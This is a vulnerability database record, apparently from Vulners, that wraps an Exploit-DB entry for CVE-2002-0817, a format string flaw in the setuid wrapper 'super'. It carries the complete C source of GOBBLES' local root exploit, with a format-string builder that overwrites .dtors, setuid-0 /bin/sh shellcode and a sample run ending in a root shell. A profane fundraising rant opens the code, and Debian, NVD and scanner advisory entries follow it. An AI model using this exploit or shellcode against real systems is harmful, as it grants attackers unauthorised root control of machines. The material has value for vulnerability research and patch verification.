William Deich Super 3.x SysLog Format String Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:21674", "cvelist": ["CVE-2002-0817"], "modified": "2002-07-31T00:00:00", "lastseen": "2016-02-02T17:01:00", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/5367/info\r\n\r\nsuper is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. \r\n\r\n/*\r\n * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES\r\n *\r\n * When GOBBLES say he and he security team\r\n * are non-profit. He really mean NON-profit.\r\n * This means GOBBLES and he GOBBLES Security\r\n * Labs (GSL) friends do not have much funds.\r\n *\r\n * GOBBLES was hoping to receive the money \r\n * for speaking at the defcon gathering of\r\n * security enthusiasts up front. So he could buy \r\n * and pay for he ticket to Las Vegas from the great city\r\n * of Baltimore where he currently resides.\r\n *\r\n * GOBBLES is not selling out. GOBBLES is just admitting that he\r\n * need your help. Please, help GOBBLES!\r\n *\r\n * After many e-mails to defcon organisers it became\r\n * apparent to GOBBLES this was not going to happen.\r\n * This mean GOBBLES has no way of getting to defcon.\r\n * This also mean GOBBLES cannot deliver he talk that\r\n * are named \"Wolves among us\". Alot of time and work\r\n * went into the preperation of this talk and it was\r\n * to be the grand finale of the year of the turkey\r\n * (2002). With many new 0-day to give out and many\r\n * great anouncements to be made.\r\n *\r\n * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) \r\n * you, the defcon attendee, may very well get cheated out \r\n * of attending one of the most provocative and daring\r\n * events defcon history has ever seen. \r\n *\r\n * \t!!! ITS NOT TOO LATE..BUT HURRY !!!\r\n * \r\n * Help GOBBLES go to defcon. GOBBLES give so much to\r\n * the community..is it not time the community now help\r\n * a poverty stricken turkey to spread his wings and fly\r\n * towards fame and glory? \r\n *\r\n * Reasons why you should help GOBBLES get to defcon:\r\n * \r\n * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper\r\n *\r\n * -- Seeing GOBBLES present naked: Priceless.\r\n * \r\n * -- Zeroday (possible hardcover) GOBBLES comic\r\n *\r\n * -- A chance to buy GOBBLES art\r\n *\r\n * -- A chance to receive _free_ GOBBLES T-shirts\r\n * \r\n * -- Copies of those exploits you couldn't code\r\n *\r\n *\r\n * What does GOBBLES need?\r\n *\r\n * Basically GOBBLES need to round up 300 US dollars before saturday.\r\n * \"Wolves among us\" is sheduled for the last day of defcon.\r\n * Namely 3PM on Sunday August 4th. As you can very well imagine\r\n * this talk was going to blow the lid off of more dirty secrets\r\n * than there are noodles in China. With your help GOBBLES can still \r\n * make this happen. So what GOBBLES is asking for is a little helping\r\n * hand from the community. If anyone has the funds to sponsor GOBBLES\r\n * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.\r\n *\r\n * !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!\r\n *\r\n * GOBBLES accepts Western Union payments. GOBBLES will not accept anything\r\n * beyond the amount needed for travel to Vegas and back. GOBBLES is not \r\n * selling out, GOBBLES is asking help from those penetrators and researchers\r\n * that GOBBLES helps every day.\r\n *\r\n * In other news, ISS rejected GOBBLES request for a job application. It \r\n * seems that they're afraid of getting scalp'd.\r\n *\r\n * \t\t\t Political statement:\r\n * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE\r\n * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!\r\n *\r\n * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN \r\n * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00\r\n * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM\r\n */\r\n\r\n/*\r\n * GOBBLES-own-super.c \r\n * -- root exploit for root hole in root wrapper\r\n * \r\n * Super is sudo wannabe that boasts much security.\r\n * GOBBLES think people who write setuid wrappers\r\n * should learn to program securely before opening\r\n * big hoohoo about how secure program is.\r\n *\r\n * Current super version (3.18):\r\n -- ftp://ftp.ucolick.org/pub/users/will/\r\n * \r\n * Super maintainer say following about he code:\r\n *\r\n * \"Super allows an admin to control access to files\r\n * and functions for users. It is similar to sudo, but \r\n * uses a different approach in the configuration file.\"\r\n *\r\n * Problem:\r\n * \r\n * When super is compiled to use syslog(3) for its logging\r\n * of error messages the following lines makes pre-auth\r\n * local root exploitation rather trivial:\r\n * \r\n * From error.c \r\n * ... \r\n * #define SysLog(pri, buf) syslog((pri), (buf))\r\n * ...\r\n * SysLog(error_priority, buf);\r\n * ...\r\n *\r\n * This means users that are not in the super config file\r\n * will be able to execute code with root priviledges.\r\n *\r\n * \"Super acts as a SetUID wrapper around system commands\r\n * to make sure the commands are executed safely, and\r\n * only by authorized users.\"\r\n *\r\n * \t\thehehe ;PPpPPPPp\r\n *\r\n * Love, \r\n * GOBBLES\r\n * GOBBLES@hushmail.com\r\n * \r\n * Official site: http://www.bugtraq.org\r\n * Official mirror: http://www.immunitysec.com/GOBBLES/\r\n */\r\n\r\n/* Proof Of Concept:\r\n\r\n$ gcc GOBBLES-own-super.c -o GOBBLES-own-super \r\n$ ./GOBBLES-own-super \r\n\r\nUsage: \r\n./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]\r\n\r\n$ objdump -s -j .dtors /usr/local/bin/super\r\n\r\n/usr/local/bin/super: file format elf32-i386\r\n\r\nContents of section .dtors:\r\n 8063f7c ffffffff 00000000 ........ \r\n\r\n$ ./GOBBLES-own-super -t 0x8063f7c\r\n. target @ 0x8063f80\r\n. shellcode @ 0xbfffffb0\r\n. username: 9 bytes\r\nsuper: No such super command as `xx\ufffd\ufffd%.49103x%29$hn%.16305x%30$hn'.\r\nsh-2.05# \r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pwd.h>\r\n#include <sys/types.h>\r\n\r\n#define ALLIGN\t\t2 \r\n#define DPA\t\t29 \t\r\n\r\n#define SUPER\t\t\"/usr/local/bin/super\"\r\n\r\nvoid buildstring(unsigned long t, unsigned long w, int dpa, int allign);\r\nvoid stuff(void);\r\n\r\nextern char **environ;\r\nchar string[256];\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tunsigned long t, w;\r\n\tint dpa, allign, shift = 0;\r\n\tchar c, *store;\t\r\n\r\n\tif(argc == 1) {\r\n\t\tfprintf(stderr, \"\\nUsage: \\n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\\n\", argv[0]);\r\n\t\texit(0);\r\n\t}\r\n\t\r\n\tallign = ALLIGN;\r\n\tdpa = DPA;\r\n\t\r\n\twhile((c = getopt(argc, argv, \"t:o:A:\")) != EOF) {\r\n\t\tswitch(c) {\r\n\t\t\tcase 't':\r\n\t\t\t\tsscanf(optarg, \"%p\", &store);\r\n\t\t\t\tt = (long)store;\r\n\t\t\t \tt += 4;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'o':\r\n\t\t\t\tdpa = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'A':\r\n\t\t\t\tallign = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tfprintf(stderr, \"hehehe ;PPppPPPp\\n\");\r\n\t\t\t\texit(0);\r\n\t\t}\r\n\t}\r\n\t\r\n\tstore = NULL;\r\n\r\n\tif((store = getenv(\"GOBBLES\")) == NULL) {\r\n\t\tstuff();\r\n\t\tif(execve(argv[0], argv, environ)) {\r\n\t\t\tfprintf(stderr, \". problem re-executing\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\t\r\n\tw = (long)store;\r\n\t// shift is signed so this works both ways\r\n\tshift = (strlen(argv[0]) - strlen(SUPER));\r\n\tw += shift;\r\n\t\r\n\tfprintf(stderr, \". target @ %p\\n. shellcode @ %p\\n\", t, w);\r\n\t\t\t\r\n\tbuildstring(t, w, dpa, allign);\r\n\t\r\n\tif(execl(SUPER, \"super\", string, NULL)) {\r\n\t\tfprintf(stderr, \"error executing\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nvoid \r\nbuildstring(unsigned long t, unsigned long w, int dpa, int allign)\r\n{\r\n\tunsigned int un, deux, x, b[4], namelen;\r\n\tchar a_buf[4];\r\n\tstruct passwd *pass;\t\r\n\r\n\tmemset(string, '\\0', sizeof(string));\r\n\tmemset(a_buf, '\\0', sizeof(a_buf));\r\n\t\r\n\tif((pass = getpwuid(getuid())) == NULL) {\r\n\t\tfprintf(stderr, \". can't find your username\\n\");\r\n\t\texit(1);\r\n\t}\r\n \r\n\tnamelen = strlen(pass->pw_name);\r\n\r\n\tfprintf(stderr, \". username: %d bytes\\n\", namelen);\r\n\r\n\tfor(x = 0; x < allign && x < sizeof(a_buf); x++)\r\n\t\ta_buf[x] = 'x';\r\n\r\n\tb[0] = (t & 0x000000ff);\r\n\tb[1] = (t & 0x0000ff00) >> 8;\r\n\tb[2] = (t & 0x00ff0000) >> 16;\r\n\tb[3] = (t & 0xff000000) >> 24; \r\n\r\n\tun = (w >> 16) & 0xffff;\r\n\tdeux = w & 0xffff; \r\n\r\n\tif(un < deux) {\r\n snprintf(string, sizeof(string)-1, \r\n\t\t\t\"%s\" \r\n\t\t\t\"%c%c%c%c%c%c%c%c\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\",\r\n a_buf, \r\n\t\t\tb[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],\r\n un - (8 + allign + 29 + namelen), \r\n\t\t\tdpa, deux - un, dpa + 1 \r\n\t\t\t\r\n\t\t);\r\n }\r\n else {\r\n snprintf(string, sizeof(string)-1, \r\n\t\t\t\"%s\" \r\n\t\t\t\"%c%c%c%c%c%c%c%c\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\",\r\n a_buf, \r\n\t\t\tb[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],\r\n deux - (8 + allign + 29 + namelen), \r\n\t\t\tdpa, un-deux, dpa + 1\r\n\t\t\t\r\n\t\t);\r\n }\r\n}\r\n\r\nvoid \r\nstuff(void)\r\n{\r\n char code[] = // the setuid 0 with the execve of the /bin/sh\r\n\t\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\"\r\n\t\"\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\"\r\n\t\"\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\"\r\n\t\"\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";\r\n\tsetenv(\"GOBBLES\", code, 1);\r\n}\r\n\r\n", "published": "2002-07-31T00:00:00", "href": "https://www.exploit-db.com/exploits/21674/", "osvdbidlist": ["5075"], "reporter": "gobbles", "hash": "5b1236ea595362414594a430fa938540ffed512fbe1258ef23049a563edebbd5", "title": "William Deich Super 3.x SysLog Format String Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "William Deich Super 3.x SysLog Format String Vulnerability. CVE-2002-0817 . Local exploit for linux platform", "references": [], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21674/"}

{"result": {"cve": [{"id": "CVE-2002-0817", "type": "cve", "title": "CVE-2002-0817", "description": "Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument.", "published": "2002-08-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0817", "cvelist": ["CVE-2002-0817"], "lastseen": "2017-04-18T15:49:44"}], "osvdb": [{"id": "OSVDB:5075", "type": "osvdb", "title": "Linux Super Format String Elevated Privileges", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 9741\n[CVE-2002-0817](https://vulners.com/cve/CVE-2002-0817)\nBugtraq ID: 5367\n", "published": "2004-04-08T23:13:57", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:5075", "cvelist": ["CVE-2002-0817"], "lastseen": "2017-04-28T13:19:59"}], "debian": [{"id": "DSA-139", "type": "debian", "title": "super -- format string vulnerability", "description": "GOBBLES found an insecure use of format strings in the super package. The included program super is intended to provide access to certain system users for particular users and programs, similar to the program sudo. Exploiting this format string vulnerability a local user can gain unauthorized root access.\n\nThis problem has been fixed in version 3.12.2-2.1 for the old stable distribution (potato), in version 3.16.1-1.1 for the current stable distribution (woody) and in version 3.18.0-3 for the unstable distribution (sid).\n\nWe recommend that you upgrade your super package immediately.", "published": "2002-08-01T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-139", "cvelist": ["CVE-2002-0817"], "lastseen": "2016-09-02T18:36:30"}], "openvas": [{"id": "OPENVAS:53401", "type": "openvas", "title": "Debian Security Advisory DSA 139-1 (super)", "description": "The remote host is missing an update to super\nannounced via advisory DSA 139-1.", "published": "2008-01-17T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=53401", "cvelist": ["CVE-2002-0817"], "lastseen": "2016-09-26T20:41:36"}], "nessus": [{"id": "DEBIAN_DSA-139.NASL", "type": "nessus", "title": "Debian DSA-139-1 : super - format string vulnerability", "description": "GOBBLES found an insecure use of format strings in the super package.\nThe included program super is intended to provide access to certain system users for particular users and programs, similar to the program sudo. Exploiting this format string vulnerability a local user can gain unauthorized root access.", "published": "2004-09-29T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=14976", "cvelist": ["CVE-2002-0817"], "lastseen": "2016-09-26T17:25:25"}]}}